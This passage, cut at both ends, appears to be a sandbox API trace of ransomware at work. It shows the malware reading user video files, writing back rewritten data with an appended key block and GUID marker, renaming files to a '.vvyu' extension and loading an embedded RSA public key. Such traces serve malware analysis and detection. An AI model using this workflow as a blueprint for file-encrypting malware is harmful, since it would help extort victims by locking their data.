hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xcdf0) returned 0x2d4f778 [0197.818] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d430 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d478 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.819] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0197.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a498 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a480 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0197.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0197.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.823] GetCurrentThreadId () returned 0x264 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4bf70 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.823] GetCurrentThreadId () returned 0x264 [0197.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0197.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a498 [0197.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4f8 [0197.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0197.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0197.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0197.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a510 [0197.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4b0 [0197.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a480 [0197.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0197.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0197.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0197.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0197.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d478 | out: hHeap=0x6a0000) returned 1 [0197.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.837] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0xcde1, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0xcde1, lpOverlapped=0x0) returned 1 [0197.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.838] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xcde6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.838] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.840] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.840] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.840] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.840] CloseHandle (hObject=0x52c) returned 1 [0197.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0197.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d3a670 [0197.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0197.843] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\Fjxa.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\fjxa.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\Fjxa.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\fjxa.mp4.vvyu")) returned 1 [0197.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.848] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0197.851] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa7be70, ftCreationTime.dwHighDateTime=0x1d89ea7, ftLastAccessTime.dwLowDateTime=0xb5210d40, ftLastAccessTime.dwHighDateTime=0x1d8a4f3, ftLastWriteTime.dwLowDateTime=0xb5210d40, ftLastWriteTime.dwHighDateTime=0x1d8a4f3, nFileSizeHigh=0x0, nFileSizeLow=0x94e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jQfTOUtHGP-pWFb0a.flv", cAlternateFileName="JQFTOU~1.FLV")) returned 1 [0197.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0197.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.852] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\jQfTOUtHGP-pWFb0a.flv") returned=".flv" [0197.852] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\jQfTOUtHGP-pWFb0a.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\jqftouthgp-pwfb0a.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.852] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=38120) returned 1 [0197.852] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.855] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x94c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.855] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.858] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.858] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x94e8, lpOverlapped=0x0) returned 1 [0197.859] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.859] lstrlenA (lpString="-----BEGIN PUBLIC 